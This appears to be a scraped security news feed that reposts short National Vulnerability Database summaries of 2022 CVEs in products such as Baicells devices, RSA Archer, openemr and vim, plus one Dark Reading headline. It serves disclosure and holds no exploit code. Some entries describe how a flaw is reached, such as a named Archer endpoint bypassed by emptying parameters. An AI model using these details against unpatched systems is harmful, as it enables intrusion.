‼ CVE-2022-24693 ‼
📖 Read
via "National Vulnerability Database".
Baicells Nova436Q and Neutrino 430 devices with firmware through QRTB 2.7.8 have hardcoded credentials that are easily discovered, and can be used by remote attackers to authenticate via ssh. (The credentials are stored in the firmware, encrypted by the crypt function.)📖 Read
via "National Vulnerability Database".
‼ CVE-2022-26951 ‼
📖 Read
via "National Vulnerability Database".
Archer 6.x through 6.10 (6.10.0.0) contains a reflected XSS vulnerability. A remote SAML-unauthenticated malicious Archer user could potentially exploit this vulnerability by tricking a victim application user into supplying malicious HTML or JavaScript code to the vulnerable web application; the malicious code is then reflected back to the victim and gets executed by the web browser in the context of the vulnerable web application.📖 Read
via "National Vulnerability Database".
‼ CVE-2021-41594 ‼
📖 Read
via "National Vulnerability Database".
In RSA Archer 6.9.SP1 P3, if some application functions are precluded by the Administrator, this can be bypassed by intercepting the API request at the /api/V2/internal/TaskPermissions/CheckTaskAccess endpoint. If the parameters of this request are replaced with empty fields, the attacker achieves access to the precluded functions.📖 Read
via "National Vulnerability Database".
‼ CVE-2022-26950 ‼
📖 Read
via "National Vulnerability Database".
Archer 6.x through 6.9 P2 (6.9.0.2) is affected by an open redirect vulnerability. A remote unprivileged attacker may potentially redirect legitimate users to arbitrary web sites and conduct phishing attacks. The attacker could then steal the victims' credentials and silently authenticate them to the Archer application without the victims realizing an attack occurred.📖 Read
via "National Vulnerability Database".
‼ CVE-2020-24770 ‼
📖 Read
via "National Vulnerability Database".
SQL injection vulnerability in modrules.php in NexusPHP 1.5 allows remote attackers to execute arbitrary SQL commands via the id parameter.📖 Read
via "National Vulnerability Database".
‼ CVE-2022-27816 ‼
📖 Read
via "National Vulnerability Database".
SWHKD 1.1.5 unsafely uses the /tmp/swhks.pid pathname. There can be data loss or a denial of service.📖 Read
via "National Vulnerability Database".
‼ CVE-2022-27432 ‼
📖 Read
via "National Vulnerability Database".
A Cross-Site Request Forgery (CSRF) in Pluck CMS v4.7.15 allows attackers to change the password of any given user by exploiting this feature leading to account takeover.📖 Read
via "National Vulnerability Database".
‼ CVE-2022-27815 ‼
📖 Read
via "National Vulnerability Database".
SWHKD 1.1.5 unsafely uses the /tmp/swhkd.pid pathname. There can be an information leak or denial of service.📖 Read
via "National Vulnerability Database".
‼ CVE-2022-1172 ‼
📖 Read
via "National Vulnerability Database".
Null Pointer Dereference Caused Segmentation Fault in GitHub repository gpac/gpac prior to 2.1.0-DEV.📖 Read
via "National Vulnerability Database".
👍1
‼ CVE-2022-23868 ‼
📖 Read
via "National Vulnerability Database".
RuoYi v4.7.2 contains a CSV injection vulnerability through ruoyi-admin when a victim opens .xlsx log file.📖 Read
via "National Vulnerability Database".
‼ CVE-2022-1177 ‼
📖 Read
via "National Vulnerability Database".
Accounting User Can Download Patient Reports in openemr in GitHub repository openemr/openemr prior to 6.1.0.📖 Read
via "National Vulnerability Database".
‼ CVE-2022-25598 ‼
📖 Read
via "National Vulnerability Database".
Apache DolphinScheduler user registration is vulnerable to Regular express Denial of Service (ReDoS) attacks, Apache DolphinScheduler users should upgrade to version 2.0.5 or higher.📖 Read
via "National Vulnerability Database".
‼ CVE-2022-23869 ‼
📖 Read
via "National Vulnerability Database".
In RuoYi v4.7.2 through the WebUI, user test1 does not have permission to reset the password of user test3, but the password of user test3 can be reset through the /system/user/resetPwd request.📖 Read
via "National Vulnerability Database".
‼ CVE-2022-1178 ‼
📖 Read
via "National Vulnerability Database".
Stored Cross Site Scripting in GitHub repository openemr/openemr prior to 6.0.0.4.📖 Read
via "National Vulnerability Database".
‼ CVE-2022-1155 ‼
📖 Read
via "National Vulnerability Database".
Old sessions are not blocked by the login enable function. in GitHub repository snipe/snipe-it prior to 5.3.10.📖 Read
via "National Vulnerability Database".
‼ CVE-2022-1154 ‼
📖 Read
via "National Vulnerability Database".
Use after free in utf_ptr2char in GitHub repository vim/vim prior to 8.2.4646.📖 Read
via "National Vulnerability Database".
‼ CVE-2022-1181 ‼
📖 Read
via "National Vulnerability Database".
Stored Cross Site Scripting in GitHub repository openemr/openemr prior to 6.0.0.2.📖 Read
via "National Vulnerability Database".
‼ CVE-2022-24131 ‼
📖 Read
via "National Vulnerability Database".
DouPHP v1.6 Release 20220121 is affected by Cross Site Scripting (XSS) through /admin/login.php in the background, which will lead to JavaScript code execution.📖 Read
via "National Vulnerability Database".
‼ CVE-2022-1180 ‼
📖 Read
via "National Vulnerability Database".
Reflected Cross Site Scripting in GitHub repository openemr/openemr prior to 6.0.0.4.📖 Read
via "National Vulnerability Database".
‼ CVE-2022-1179 ‼
📖 Read
via "National Vulnerability Database".
Non-Privilege User Can Created New Rule and Lead to Stored Cross Site Scripting in GitHub repository openemr/openemr prior to 6.0.0.4.📖 Read
via "National Vulnerability Database".
🕴 How Security Complexity Is Being Weaponized 🕴
📖 Read
via "Dark Reading".
As environments grow noisier, it becomes easier for attackers to intentionally create distractions.📖 Read
via "Dark Reading".
Dark Reading
How Security Complexity Is Being Weaponized
As environments grow noisier, it becomes easier for attackers to intentionally create distractions.